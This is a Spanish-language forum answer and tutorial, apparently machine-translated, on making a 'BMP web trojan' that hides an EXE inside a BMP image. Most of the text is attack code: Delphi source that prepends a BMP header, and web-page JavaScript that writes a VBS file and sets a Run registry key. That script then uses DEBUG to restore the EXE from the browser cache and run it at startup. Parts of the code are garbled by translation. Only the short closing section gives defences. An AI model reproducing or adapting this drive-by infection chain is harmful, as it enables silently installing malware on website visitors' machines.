¿Qué paquete se puede utilizar para generar un troyano con una extensión bmp?
¡Depende del tipo de troyano que crees!
El paquete que he usado es bastante fácil de usar. Puedes usar otros paquetes.
El archivo EXE se comprime y sintetiza en un formato autoextraíble usando WINARA. Se puede transferir a través de QQ~ También puedes empaquetarlo~
Explicación detallada del troyano web BMP
Primero. Antes que nada, expliquemos qué no es. Es algo nuevo, pero alguien dijo recientemente que no lo tenemos, así que escribí un artículo y lo publiqué para que todos lo probaran. ¿Qué es un troyano web BMP? es diferente del troyano que utilizó la vulnerabilidad del encabezado MIME que se ha utilizado durante mucho tiempo en el pasado. El troyano MIME utiliza MIME para codificar un archivo EXE en un archivo EML (letra OUT LOOK) y colocarlo en la página web para su uso. las vulnerabilidades de codificación de IE y OE para lograr la descarga y ejecución automática.
Sin embargo, el troyano BMP es diferente. El archivo EXE está disfrazado de archivo de imagen BMP, engañando a IE para que lo descargue automáticamente. y luego use el script JAVASCRIPT en la página web para encontrar la carpeta temporal de Internet del cliente, busque el archivo BMP descargado y cópielo en el directorio TEMP. Luego escriba un script para copiar el archivo encontrado. Use DEBUG para restaurar el archivo BMP a EXE. y colóquelo en el elemento de inicio del registro para que se ejecute la próxima vez que inicie. Sin embargo, esta tecnología solo puede funcionar en 9X y no tiene poder para 2K y XP.
Parece muy complicado, vamos. Vaya paso a paso:
1) Cómo convertir EXE a BMP
Lo sabrá al verificar usted mismo la información del archivo BMP, el encabezado del archivo BMP tiene 54 bytes. En pocas palabras, contiene la longitud, el ancho, el número de bits, el tamaño del archivo y la longitud del área de datos del archivo BMP. Solo necesitamos agregar el encabezado del archivo BMP correspondiente delante del encabezado del archivo EXE (por supuesto, los datos en el encabezado del archivo BMP deben coincidir con el tamaño del archivo EXE), para que se pueda engañar a IE para que descargue el archivo BMP. Al principio, hicimos experimentos con archivos JPG y descubrimos que si el encabezado del archivo es incorrecto, IE lo hará. No lo descargues. El código de conversión es el siguiente:
programa exe2bmp;
usa
Windows,
SysUtils;
var len, fila,col,fs: DWORD;
buffer: matriz[0..255]de char;
fd: WIN32_FIND_DATA;
h,hw: THandle ;
comenzar
if (ParamStr(1)<>'') y(ParamStr(2)<>'') luego comenzar //Si no hay dos parámetros después de ejecutar Salir
si FileExists(ParamStr(1)) entonces comienza
FindFirstFile(Pchar(ParamStr(1)),fd);
fs:=fd.nFileSizeLow;
col := 4;
mientras sea verdadero, comience
si (fs mod 12)=0 entonces comience <. /p>
len :=fs;
fin más len:=fs+12-(fs mod 12);
fila := len div col div 3;
si fila>col entonces comienza
col:=col+4;
fin si no Salir;
fin;
FillChar(buffer, 256,0);
{Los siguientes son los datos del encabezado del archivo BMP}
Buffer[0]:='B'
;Buffer[1]:='M';
PDWORD(@buffer[18])^:=col;
PDWORD(@buffer[22])^:=fila ;
PDWORD(@buffer[34])^:=len;
PDWORD(@buffer[2])^:=len+54;
PDWORD(@buffer[10])^:=54;
PDWORD(@buffer[14])^:=40;
PWORD(@buffer[26])^: =1;
PWORD(@buffer[28])^:=24;
{Escribir archivo}
hw:=CreateFile(Pchar(ParamStr ( 2)),GENERIC_WRITE,FILE_SHARE_READ o FILE_SHARE_WRITE,nil,CREATE_ALWAYS,0,0);
h:=CreateFile(Pchar(ParamStr(1)),GENERIC_READ,FILE_SHARE_READ o FILE_SHARE_WRITE,nil,OPEN_EXISTING, 0 ,0);
WriteFile(hw,buffer,54,col,0);
repetir
ReadFile(h,buffer,256,col, 0 );
WriteFile(hw,buffer,col,col,0);
hastacol<>256;
WriteFile(hw,buffer,len- fs ,col,0);
CloseHandle(h);
CloseHandle(hw);
fin;
fin;< / p>
end.
El código anterior se puede compilar en DELPHI4, 5 y 6, y puede obtener un archivo exe2bmp.exe. Abra el modo MSDOS e ingrese
Presione Enter para convertir el archivo EXE especificado por el segundo parámetro al formato BMP.
Luego, la imagen BMP se coloca en la página web. Si ha abierto esta imagen, debe haber descubierto que este BMP es floral y el color es monótono. Por lo tanto, es mejor utilizar este formato al colocarlo en la página web.
El siguiente es el script colocado. en la página web
document.write(' ');
función docsave()
{
a=document.applets[ 0];
a.setCLSID('{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}');
a.createInstance();
wsh =a.GetObject ();
a.setCLSID('{0D43FE01-F093-11CF-8940-00A0C9054228}');
a.createInstance();
fso =a.GetObject();
var winsys=fso.GetSpecialFolder(1);
var vbs=winsys+'\\s.vbs';
wsh.RegWrite
('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run \\vbs','wscript '+'"'+vbs+'" ');
var st=fso.CreateTextFile(vbs,true);
st.WriteLine(' Option Explicit');
st.WriteLine('Dim FSO,WSH,CACHE,str');
st.WriteLine('Set FSO = CreateObject("Scripting.FileSystemObject" )');
st.WriteLine('Set WSH = CreateObject("WScript.Shell")');
st.WriteLine('CACHE=wsh.RegRead("HKCU \\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ShellFolders\\Cache")');
st.WriteLine('wsh.RegDelete("HKCU\\Software\\Microsoft \\Windows\\CurrentVersion\\Run\\vbs")');
st.WriteLine ('wsh.RegWrite "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\ \tmp","tmp.exe"');
st.WriteLine('SearchBMPFile fso.GetFolder(CACHE),"mybmp[1].bmp"');
st.WriteLine('WScript.Quit()');
st.WriteLine('Function SearchBMPFile(Folder,fname)');
st.WriteLine(' Dim SubFolder, File,Lt,tmp,winsys');
st.WriteLine(' str=FSO.GetParentFolderName(carpeta) & "\\" & carpeta.nombre & "\\" & fname');
st.WriteLine(' si FSO.FileExists(str) entonces');
st.WriteLine(' tmp=fso.GetSpecialFolder(2) & "\\"');
st.WriteLine(' winsys=fso.GetSpecialFolder(1) & "\\"');
st.WriteLine(' set File=FSO.GetFile(str)' );
st.WriteLine(' File.Copy(tmp & "tmp.dat")');
st.WriteLine(' File.Delete');
st.WriteLine(' set Lt=FSO.CreateTextFile(tmp & "tmp.in")');
st.WriteLine('
Lt.WriteLine("rbx")');
st.WriteLine(' Lt.WriteLine("0")');
st.WriteLine(' Lt.WriteLine( "rcx")');
st.WriteLine(' Lt.WriteLine("1000")');
st.WriteLine(' Lt.WriteLine("w136") ');
st.WriteLine(' Lt.WriteLine("q")');
st.WriteLine(' Lt.Close');
st.WriteLine(' WSH.Run "comando /c debug " & tmp & "tmp.dat <" & tmp & "tmp.in >" & tmp & "tmp.out",false,6');
st.WriteLine(' En caso de error, reanudar a continuación ');
st.WriteLine(' FSO.GetFile(tmp & "tmp.dat").Copy(winsys & "tmp.exe ")');
st.WriteLine(' FSO.GetFile(tmp & "tmp.dat").Delete');
st.WriteLine(' FSO.GetFile( tmp & "tmp.in").Delete');
st.WriteLine(' FSO.GetFile(tmp & "tmp.out").Delete');
st .WriteLine(' end if');
st.WriteLine(' If Folder.SubFolders.Count <> 0 Then');
st.WriteLine(' Para cada subcarpeta en Folder.SubFolders');
st.WriteLine(' SearchBMPFile SubFolder,fname');
st.WriteLine(' Next');
st. WriteLine('End If');
st.WriteLine('End Function');
st.Close();
}
setTimeout('docsave()',1000);
Guarde el script como "js.js" e insértelo en la página web:
Este script será principalmente utilizado localmente Se genera un archivo "S.VBS" en el directorio SISTEMA de la máquina y el archivo de secuencia de comandos se ejecutará automáticamente la próxima vez que se encienda. Se utiliza principalmente para encontrar el archivo mybmp[1].bmp en el directorio temporal.
El contenido principal del archivo "S.VBS" es el siguiente:
Opción explícita
Dim FSO,WSH,CACHE,str
Establecer FSO = CreateObject("Scripting.FileSystemObject")
Establecer WSH = CreateObject("WScript.Shell")
CACHE=wsh.RegRead("HKCU\Software\ Microsoft\Windows\CurrentVersion \Explorer\ShellFolders\Cache")
wsh.RegDelete("HKCU\Software\Microsoft\Windows\CurrentVersion\Run\vbs")
wsh.RegWrite "HKCU\Software\ Microsoft\Windows\CurrentVersion\Run\tmp","tmp.exe"
BuscarBMPFile fso.GetFolder(CACHE),"mybmp[1].bmp"
WScript.Quit( )
Función SearchBMPFile(Carpeta,fname)
Dim SubFolder,File,Lt,tmp,winsys
'Encontrar la imagen BMP de destino desde la carpeta temporal
str=FSO.GetParentFolderName(carpeta) & "\" & carpeta.name & "\" & fname
si FSO.FileExists(str) entonces
tmp=fso.GetSpecialFolder(2) & "\"
winsys=fso.GetSpecialFolder(1) & "\"
set File=FSO.GetFile( str)
File.Copy(tmp & "tmp.dat")
File.Delete
'Generar un script DEBUG
establecer Lt=FSO CreateTextFile(tmp & "tmp.in")
Lt.WriteLine("rbx")
Lt.WriteLine("0")
<. p>Lt.WriteLine ("rcx")'1000 en la siguiente línea es hexadecimal, convertido a decimal es 4096 (este número es el tamaño de su archivo EXE)
Lt.WriteLine( "1000")
Lt.WriteLine("w136")
Lt.WriteLine("q")
Lt.Close
WSH.Ejecutar "comando /c debug " & tmp & "tmp.dat <" & tmp &"tmp.in>" & tmp & "tmp.out",false,6
En caso de error, reanudar siguiente
FSO.GetFile(tmp & "tmp.dat").Copiar(winsys & "tmp.exe")
FSO.GetFile(tmp & "tmp .dat") .Eliminar
FSO.G
etFile(tmp & "tmp.in").Delete
FSO.GetFile(tmp & "tmp.out").Delete
end if
If Folder.SubFolders.Count <> 0 Luego
Para cada subcarpeta en Folder.SubFolders
SearchBMPFile SubFolder,fname
Siguiente
Fin Si
Función final
Este script encontrará el archivo bmp en la carpeta temporal y generará un script DEBUG. Leerá automáticamente 54 bytes del archivo BMP cuando se ejecute. del tamaño que especifique y guárdelo en tmp.dat. El script posterior lo copiará en el directorio SISTEMA. El archivo EXE restaurado se ejecutará la próxima vez que reinicie. Este es el proceso de implementación de BMP Trojan Basic. p>Para obtener un código de secuencia de comandos detallado, consulte _blank href=>
Método de prevención:
El más simple, elimine o cambie el nombre del archivo wscrpit.exe y el archivo DEBUG;
Instale un software antivirus eficaz, ya que muchos programas antivirus pueden detectar estos scripts.
Cuando las condiciones lo permitan, instale WIN2K SP3 y trate de evitar visitar algún sitio web de origen desconocido.